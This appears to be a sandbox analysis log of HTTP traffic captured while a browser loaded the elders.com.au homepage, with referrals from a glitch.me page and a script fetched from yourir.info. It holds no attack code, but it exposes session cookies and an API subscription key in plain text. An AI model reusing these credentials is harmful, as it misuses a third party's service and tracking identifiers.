      Source: global trafficHTTP traffic detected: GET /40cb4d5b590922d8.js HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /.model.json/ HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/facebook.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/two_staff_members_with_client_by_ute.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/logos/Red_logo.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/xicon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=Zyr_0wAAAJ46RQN- HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=06707212550236574584203622074167040076; dpm=06707212550236574584203622074167040076
      Source: global trafficHTTP traffic detected: GET /tr/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870998002&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870998002&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870995967&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&cs_est=true&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870995967&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&cs_est=true&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /bin/el/localised-news?branchId= HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/youtube.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/Instagram.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Ocp-Apim-Subscription-Key: 93e156a515ad4dd497c991b125dffcc2sec-ch-ua-platform: "Windows"Origin: https://elders.com.auSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bin/el/local-branch?branchId=1669702755463&type=default HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/linkedin.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
